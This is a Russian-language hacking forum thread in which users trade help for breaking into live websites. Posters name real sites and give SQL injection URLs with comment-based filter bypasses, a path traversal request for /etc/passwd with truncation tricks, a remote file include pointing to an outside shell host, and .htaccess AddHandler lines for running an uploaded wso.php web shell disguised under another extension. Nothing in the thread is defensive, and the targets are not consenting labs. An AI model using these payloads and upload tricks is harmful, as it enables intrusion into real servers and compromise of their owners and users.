Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    еще вопрос.

    Надо залить шелл. В админке могу только редактировать новости, а в новостях добавлять картинки. При добавлении картинки все хорошо заливается, даже расширение .пхп. Заливается на сервер. НО когда я заливаю например wso.php и потом иду по ссылки картинки получаю The server encountered an internal error or misconfiguration and was unable to complete your request.

    когда же заливаю шелл с расширением например .jpg то нормально переходит по ссылке, но шел не срабатывает.

    Есть какие то еще варианты?
     
  2. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Уйма. Можешь юзать морковку, панголини, safe3, круизер в конце концов.

    Но лично я пришел к выводу, что лучше рук ничего ещё не написали)
     
  3. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Залить .htaccses как вариант. Потм залить какой-то shell.ololovskiy и открыть как исполняемый.
     
  4. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4

    ты имеешь в виду разрешить выполнение php файлов как картинку?

    типа

    Code:
    AddType application/x-httpd-jpg .php
     
    #19784 jecka3000, 14 Mar 2012
    Last edited: 14 Mar 2012
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    попробуй залить phpinfo(); и скажи что выйдет
    если нет, то да, попробуй AddType application/x-httpd-jpg .ololo
    и лей шелл.ololo
     
    _________________________
  6. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4

    С пхп инфо не прокатило.

    во втором случае просто выводит исходный код шелла, но не исполняет его
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,2,3,4,5,6,7,8,910,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+/*!from*/+/*!informaTion_schema.tables*/--+
    помогите обойти фильтр

    jecka, php_flag engine 1
    AddHandler application/x-httpd-php .ololo
     
    _________________________
    #19787 yarbabin, 14 Mar 2012
    Last edited: 14 Mar 2012
  8. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    самое смешное, что и .htaccess как txt обрабатывается, т.е. при переходе на "картинку" вылетает содержимое htaccess..странно
     
  9. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    http://www.vlunn.ru/detali2008.php?param=462+/*!union%0Aselect*/+1,table_name,3,4,5,6,78,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.`tables`+limit+1,1--+
    и т.д.
    %20 ток убери)
     
    #19789 smirk, 14 Mar 2012
    Last edited: 14 Mar 2012
  10. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Так точно. Но при:
    1'+order+by+1+--
    Выдает:
    - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--' and pd.news_id = '1'+order+by+1+--' and pd.language_id ='1'' at line 1

    А при:
    1'/**/order/**/by/**/1/**/--
    - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '79'' and pd.news_id ='1'' at line 1

    +GROUP+BY+1+--
    Также не помогает.
     
  11. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Фильтруется кавычка. Попробуй ?id=9999999999+order+by+1+--
     
  12. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Всем добрый вечер. Суть такова - через админку заливаю шелл. Расширение .php без проблем пропускается, но при обращению к этому скрипту вылетает 500 ошибка. Далее пытался залить в эту же директорию .htaccess, чтобы попробовать порулить Апачем в пределах этой директории, но беда в том, что скрипт дописывает к началу любого загружаемого файла определенные символы, и получается что-то типа x_1.htaccess.

    Что можно придумать?
     
  13. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    тоже нет.
    not found!
    Так же указано. Бага формата не ?id=1, a id/1'
    При запросе ?id=1 страница та, но ошибка отсутствует.
     
  14. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Попробуй так id/1?id=1'
    P.S: лучшее ссылку в ПМ...
     
  15. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    307
    Likes Received:
    170
    Reputations:
    12
    Ошибку не выводит. Отправил в ПМ...
     
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    народ а тут, нужно отсеять окончание, нул байт не помогает
    http://proeveryday.ru/index.php?id=../etc/passwd%00
    тут читал https://forum.antichat.ru/thread98525.html но нифига неполучилось, мб недопонял
    подскажите как правильно
     
  17. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    попробуй слешей ставить 4064 или также но такихже слешей с точкой примерно так меня выручало /./.[4064]./
     
  18. Spunoff

    Spunoff New Member

    Joined:
    16 Jan 2012
    Messages:
    40
    Likes Received:
    1
    Reputations:
    0
    site.com/page.php=about.php выдаёт about.php на сервере
    site.com/page.php=http://shell.com/shell.php показывает шелл но на моём же хосте

    Можно как-то залить шелл на site.com?
     
    #19798 Spunoff, 15 Mar 2012
    Last edited by a moderator: 15 Mar 2012
  19. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    скинь ссылку в ЛС,тут же нет экстрасенсов
     
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    скорее всего это просто ифрейм а не инклуд
     
    _________________________
Thread Status:
Not open for further replies.